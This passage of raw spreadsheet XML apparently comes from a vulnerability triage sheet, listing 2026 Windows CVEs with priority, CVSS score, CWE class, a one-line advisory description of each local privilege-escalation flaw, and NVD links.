t="inlineStr"><is><t>CWE-122</t></is></c><c r="S511" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows VOLSNAP.SYS allows an authorized attacker to execute code locally.</t></is></c><c r="T511" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69426</t></is></c></row><row r="512"><c r="A512" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B512" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C512" s="5" t="inlineStr"><is><t>CVE-2026-69432</t></is></c><c r="D512" s="5" t="n"><v>7.8</v></c><c r="E512" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F512" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G512" s="5" t="inlineStr" /><c r="H512" s="5" t="n"><v>0.003</v></c><c r="I512" s="5" t="inlineStr" /><c r="J512" s="5" t="inlineStr" /><c r="K512" s="5" t="inlineStr" /><c r="L512" s="5" t="inlineStr" /><c r="M512" s="5" t="inlineStr" /><c r="N512" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O512" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P512" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q512" s="5" t="inlineStr" /><c r="R512" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S512" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Volume Manager Driver allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T512" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69432</t></is></c></row><row r="513"><c r="A513" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B513" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C513" s="5" t="inlineStr"><is><t>CVE-2026-69433</t></is></c><c r="D513" s="5" t="n"><v>7.8</v></c><c r="E513" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F513" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G513" s="5" t="inlineStr" /><c r="H513" s="5" t="n"><v>0.003</v></c><c r="I513" s="5" t="inlineStr" /><c r="J513" s="5" t="inlineStr" /><c r="K513" s="5" t="inlineStr" /><c r="L513" s="5" t="inlineStr" /><c r="M513" s="5" t="inlineStr" /><c r="N513" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O513" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P513" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q513" s="5" t="inlineStr" /><c r="R513" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S513" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Error Reporting allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T513" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69433</t></is></c></row><row r="514"><c r="A514" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B514" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C514" s="5" t="inlineStr"><is><t>CVE-2026-69436</t></is></c><c r="D514" s="5" t="n"><v>7.8</v></c><c r="E514" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F514" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G514" s="5" t="inlineStr" /><c r="H514" s="5" t="n"><v>0.003</v></c><c r="I514" s="5" t="inlineStr" /><c r="J514" s="5" t="inlineStr" /><c r="K514" s="5" t="inlineStr" /><c r="L514" s="5" t="inlineStr" /><c r="M514" s="5" t="inlineStr" /><c r="N514" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O514" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P514" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q514" s="5" t="inlineStr" /><c r="R514" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S514" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Error Reporting allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T514" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69436</t></is></c></row><row r="515"><c r="A515" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B515" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C515" s="5" t="inlineStr"><is><t>CVE-2026-69444</t></is></c><c r="D515" s="5" t="n"><v>7.8</v></c><c r="E515" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F515" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G515" s="5" t="inlineStr" /><c r="H515" s="5" t="n"><v>0.003</v></c><c r="I515" s="5" t="inlineStr" /><c r="J515" s="5" t="inlineStr" /><c r="K515" s="5" t="inlineStr" /><c r="L515" s="5" t="inlineStr" /><c r="M515" s="5" t="inlineStr" /><c r="N515" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O515" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P515" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q515" s="5" t="inlineStr" /><c r="R515" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S515" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Windows Speech allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T515" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69444</t></is></c></row><row r="516"><c r="A516" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B516" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C516" s="5" t="inlineStr"><is><t>CVE-2026-69445</t></is></c><c r="D516" s="5" t="n"><v>7.8</v></c><c r="E516" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F516" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G516" s="5" t="inlineStr" /><c r="H516" s="5" t="n"><v>0.004</v></c><c r="I516" s="5" t="inlineStr" /><c r="J516" s="5" t="inlineStr" /><c r="K516" s="5" t="inlineStr" /><c r="L516" s="5" t="inlineStr" /><c r="M516" s="5" t="inlineStr" /><c r="N516" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O516" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P516" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q516" s="5" t="inlineStr" /><c r="R516" s="5" t="inlineStr"><is><t>CWE-22</t></is></c><c r="S516" s="5" t="inlineStr"><is><t>Improper limitation of a pathname to a restricted directory ('path traversal') in Windows Compressed Folder allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T516" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69445</t></is></c></row><row r="517"><c r="A517" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B517" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C517" s="5" t="inlineStr"><is><t>CVE-2026-69447</t></is></c><c r="D517" s="5" t="n"><v>7.8</v></c><c r="E517" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F517" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G517" s="5" t="inlineStr" /><c r="H517" s="5" t="n"><v>0.003</v></c><c r="I517" s="5" t="inlineStr" /><c r="J517" s="5" t="inlineStr" /><c r="K517" s="5" t="inlineStr" /><c r="L517" s="5" t="inlineStr" /><c r="M517" s="5" t="inlineStr" /><c r="N517" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O517" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P517" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q517" s="5" t="inlineStr" /><c r="R517" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S517" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Audio Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T517" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69447</t></is></c></row><row r="518"><c r="A518" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B518" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C518" s="5" t="inlineStr"><is><t>CVE-2026-69450</t></is></c><c r="D518" s="5" t="n"><v>7.8</v></c><c r="E518" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F518" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G518" s="5" t="inlineStr" /><c r="H518" s="5" t="n"><v>0.003</v></c><c r="I518" s="5" t="inlineStr" /><c r="J518" s="5" t="inlineStr" /><c r="K518" s="5" t="inlineStr" /><c r="L518" s="5" t="inlineStr" /><c r="M518" s="5" t="inlineStr" /><c r="N518" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O518" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P518" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q518" s="5" t="inlineStr" /><c r="R518" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S518" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Error Reporting allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T518" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69450</t></is></c></row><row r="519"><c r="A519" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B519" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C519" s="5" t="inlineStr"><is><t>CVE-2026-69455</t></is></c><c r="D519" s="5" t="n"><v>7.8</v></c><c r="E519" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F519" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G519" s="5" t="inlineStr" /><c r="H519" s="5" t="n"><v>0.003</v></c><c r="I519" s="5" t="inlineStr" /><c r="J519" s="5" t="inlineStr" /><c r="K519" s="5" t="inlineStr" /><c r="L519" s="5" t="inlineStr" /><c r="M519" s="5" t="inlineStr" /><c r="N519" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O519" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P519" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q519" s="5" t="inlineStr" /><c r="R519" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S519" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Remote Access Connection Manager allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T519" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69455</t></is></c></row><row r="520"><c r="A520" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B520" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C520" s="5" t="inlineStr"><is><t>CVE-2026-69456</t></is></c><c r="D520" s="5" t="n"><v>7.8</v></c><c r="E520" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F520" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G520" s="5" t="inlineStr" /><c r="H520" s="5" t="n"><v>0.003</v></c><c r="I520" s="5" t="inlineStr" /><c r="J520" s="5" t="inlineStr" /><c r="K520" s="5" t="inlineStr" /><c r="L520" s="5" t="inlineStr" /><c r="M520" s="5" t="inlineStr" /><c r="N520" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O520" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P520" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q520" s="5" t="inlineStr" /><c r="R520" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S520" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Windows Speech allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T520" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69456</t></is></c></row><row r="521"><c r="A521" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B521" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C521" s="5" t="inlineStr"><is><t>CVE-2026-69459</t></is></c><c r="D521" s="5" t="n"><v>7.8</v></c><c r="E521" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F521" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G521" s="5" t="inlineStr" /><c r="H521" s="5" t="n"><v>0.003</v></c><c r="I521" s="5" t="inlineStr" /><c r="J521" s="5" t="inlineStr" /><c r="K521" s="5" t="inlineStr" /><c r="L521" s="5" t="inlineStr" /><c r="M521" s="5" t="inlineStr" /><c r="N521" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O521" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P521" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q521" s="5" t="inlineStr" /><c r="R521" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S521" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Power Dependency Coordinator allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T521" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69459</t></is></c></row><row r="522"><c r="A522" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B522" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C522" s="5" t="inlineStr"><is><t>CVE-2026-69467</t></is></c><c r="D522" s="5" t="n"><v>7.8</v></c><c r="E522" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F522" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G522" s="5" t="inlineStr" /><c r="H522" s="5" t="n"><v>0.003</v></c><c r="I522" s="5" t="inlineStr" /><c r="J522" s="5" t="inlineStr" /><c r="K522" s="5" t="inlineStr"><is><t>microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1</t></is></c><c r="L522" s="5" t="inlineStr" /><c r="M522" s="5" t="inlineStr" /><c r="N522" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O522" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P522" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q522" s="5" t="inlineStr" /><c r="R522" s="5" t="inlineStr"><is><t>CWE-121</t></is></c><c r="S522" s="5" t="inlineStr"><is><t>Stack-based buffer overflow in Microsoft Graphics Component allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T522" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69467</t></is></c></row><row r="523"><c r="A523" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B523" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C523" s="5" t="inlineStr"><is><t>CVE-2026-69475</t></is></c><c r="D523" s="5" t="n"><v>7.8</v></c><c r="E523" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F523" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G523" s="5" t="inlineStr" /><c r="H523" s="5" t="n"><v>0.003</v></c><c r="I523" s="5" t="inlineStr" /><c r="J523" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K52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23" s="5" t="inlineStr" /><c r="M523" s="5" t="inlineStr" /><c r="N523" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O523" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P523" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q523" s="5" t="inlineStr" /><c r="R523" s="5" t="inlineStr"><is><t>CWE-822</t></is></c><c r="S523" s="5" t="inlineStr"><is><t>Untrusted pointer dereference in Windows Remote Desktop Services allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T523" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69475</t></is></c></row><row r="524"><c r="A524" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B524" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C524" s="5" t="inlineStr"><is><t>CVE-2026-69476</t></is></c><c r="D524" s="5" t="n"><v>7.8</v></c><c r="E524" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F524" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G524" s="5" t="inlineStr" /><c r="H524" s="5" t="n"><v>0.003</v></c><c r="I524" s="5" t="inlineStr" /><c r="J524" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K52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24" s="5" t="inlineStr" /><c r="M524" s="5" t="inlineStr" /><c r="N524" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O524" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P524" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q524" s="5" t="inlineStr" /><c r="R524" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S524" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T524" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69476</t></is></c></row><row r="525"><c r="A525" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B525" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C525" s="5" t="inlineStr"><is><t>CVE-2026-69478</t></is></c><c r="D525" s="5" t="n"><v>7.8</v></c><c r="E525" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F525" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G525" s="5" t="inlineStr" /><c r="H525" s="5" t="n"><v>0.003</v></c><c r="I525" s="5" t="inlineStr" /><c r="J525" s="5" t="inlineStr" /><c r="K525" s="5" t="inlineStr" /><c r="L525" s="5" t="inlineStr" /><c r="M525" s="5" t="inlineStr" /><c r="N525" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O525" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P525" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q525" s="5" t="inlineStr" /><c r="R525" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S525" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Device Association Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T525" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69478</t></is></c></row><row r="526"><c r="A526" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B526" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C526" s="5" t="inlineStr"><is><t>CVE-2026-69480</t></is></c><c r="D526" s="5" t="n"><v>7.8</v></c><c r="E526" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F526" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G526" s="5" t="inlineStr" /><c r="H526" s="5" t="n"><v>0.003</v></c><c r="I526" s="5" t="inlineStr" /><c r="J526" s="5" t="inlineStr" /><c r="K526" s="5" t="inlineStr" /><c r="L526" s="5" t="inlineStr" /><c r="M526" s="5" t="inlineStr" /><c r="N526" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O526" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P526" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q526" s="5" t="inlineStr" /><c r="R526" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S526" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Partition Management Driver allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T526" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69480</t></is></c></row><row r="527"><c r="A527" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B527" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C527" s="5" t="inlineStr"><is><t>CVE-2026-69489</t></is></c><c r="D527" s="5" t="n"><v>7.8</v></c><c r="E527" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F527" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G527" s="5" t="inlineStr" /><c r="H527" s="5" t="n"><v>0.003</v></c><c r="I527" s="5" t="inlineStr" /><c r="J527" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K52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27" s="5" t="inlineStr" /><c r="M527" s="5" t="inlineStr" /><c r="N527" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O527" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P527" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q527" s="5" t="inlineStr" /><c r="R527" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S527" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T527" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69489</t></is></c></row><row r="528"><c r="A528" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B528" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C528" s="5" t="inlineStr"><is><t>CVE-2026-69508</t></is></c><c r="D528" s="5" t="n"><v>7.8</v></c><c r="E528" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F528" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G528" s="5" t="inlineStr" /><c r="H528" s="5" t="n"><v>0.003</v></c><c r="I528" s="5" t="inlineStr" /><c r="J528" s="5" t="inlineStr" /><c r="K528" s="5" t="inlineStr" /><c r="L528" s="5" t="inlineStr" /><c r="M528" s="5" t="inlineStr" /><c r="N528" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O528" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P528" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q528" s="5" t="inlineStr" /><c r="R528" s="5" t="inlineStr"><is><t>CWE-121</t></is></c><c r="S528" s="5" t="inlineStr"><is><t>Stack-based buffer overflow in Windows MIDI Service Module allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T528" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69508</t></is></c></row><row r="529"><c r="A529" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B529" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C529" s="5" t="inlineStr"><is><t>CVE-2026-69509</t></is></c><c r="D529" s="5" t="n"><v>7.8</v></c><c r="E529" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F529" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G529" s="5" t="inlineStr" /><c r="H529" s="5" t="n"><v>0.003</v></c><c r="I529" s="5" t="inlineStr" /><c r="J529" s="5" t="inlineStr" /><c r="K529" s="5" t="inlineStr" /><c r="L529" s="5" t="inlineStr" /><c r="M529" s="5" t="inlineStr" /><c r="N529" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O529" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P529" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q529" s="5" t="inlineStr" /><c r="R529" s="5" t="inlineStr"><is><t>CWE-122, CWE-125</t></is></c><c r="S529" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Fax Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T529" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69509</t></is></c></row><row r="530"><c r="A530" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B530" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C530" s="5" t="inlineStr"><is><t>CVE-2026-69513</t></is></c><c r="D530" s="5" t="n"><v>7.8</v></c><c r="E530" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F530" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G530" s="5" t="inlineStr" /><c r="H530" s="5" t="n"><v>0.003</v></c><c r="I530" s="5" t="inlineStr" /><c r="J530" s="5" t="inlineStr" /><c r="K530" s="5" t="inlineStr" /><c r="L530" s="5" t="inlineStr" /><c r="M530" s="5" t="inlineStr" /><c r="N530" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O530" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P530" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q530" s="5" t="inlineStr" /><c r="R530" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S530" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Error Reporting allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T530" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69513</t></is></c></row><row r="531"><c r="A531" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B531" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C531" s="5" t="inlineStr"><is><t>CVE-2026-69528</t></is></c><c r="D531" s="5" t="n"><v>7.8</v></c><c r="E531" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F531" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G531" s="5" t="inlineStr" /><c r="H531" s="5" t="n"><v>0.003</v></c><c r="I531" s="5" t="inlineStr" /><c r="J531" s="5" t="inlineStr" /><c r="K531" s="5" t="inlineStr" /><c r="L531" s="5" t="inlineStr" /><c r="M531" s="5" t="inlineStr" /><c r="N531" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O531" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P531" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q531" s="5" t="inlineStr" /><c r="R531" s="5" t="inlineStr"><is><t>CWE-306</t></is></c><c r="S531" s="5" t="inlineStr"><is><t>Missing authentication for critical function in Windows Shell allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T531" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69528</t></is></c></row><row r="532"><c r="A532" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B532" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C532" s="5" t="inlineStr"><is><t>CVE-2026-69532</t></is></c><c r="D532" s="5" t="n"><v>7.8</v></c><c r="E532" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F532" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G532" s="5" t="inlineStr" /><c r="H532" s="5" t="n"><v>0.003</v></c><c r="I532" s="5" t="inlineStr" /><c r="J532" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K53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32" s="5" t="inlineStr" /><c r="M532" s="5" t="inlineStr" /><c r="N532" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O532" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P532" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q532" s="5" t="inlineStr" /><c r="R532" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S532" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows NTFS allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T532" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69532</t></is></c></row><row r="533"><c r="A533" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B533" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C533" s="5" t="inlineStr"><is><t>CVE-2026-69534</t></is></c><c r="D533" s="5" t="n"><v>7.8</v></c><c r="E533" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F533" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G533" s="5" t="inlineStr" /><c r="H533" s="5" t="n"><v>0.006</v></c><c r="I533" s="5" t="inlineStr" /><c r="J533" s="5" t="inlineStr" /><c r="K533" s="5" t="inlineStr" /><c r="L533" s="5" t="inlineStr" /><c r="M533" s="5" t="inlineStr" /><c r="N533" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O533" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P533" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q533" s="5" t="inlineStr" /><c r="R533" s="5" t="inlineStr"><is><t>CWE-77</t></is></c><c r="S533" s="5" t="inlineStr"><is><t>Improper neutralization of special elements used in a command ('command injection') in Windows Program Compatibility Assistant Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T533" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69534</t></is></c></row><row r="534"><c r="A534" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B534" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C534" s="5" t="inlineStr"><is><t>CVE-2026-69535</t></is></c><c r="D534" s="5" t="n"><v>7.8</v></c><c r="E534" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F534" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G534" s="5" t="inlineStr" /><c r="H534" s="5" t="n"><v>0.002</v></c><c r="I534" s="5" t="inlineStr" /><c r="J534" s="5" t="inlineStr" /><c r="K534" s="5" t="inlineStr" /><c r="L534" s="5" t="inlineStr" /><c r="M534" s="5" t="inlineStr" /><c r="N534" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O534" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P534" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c 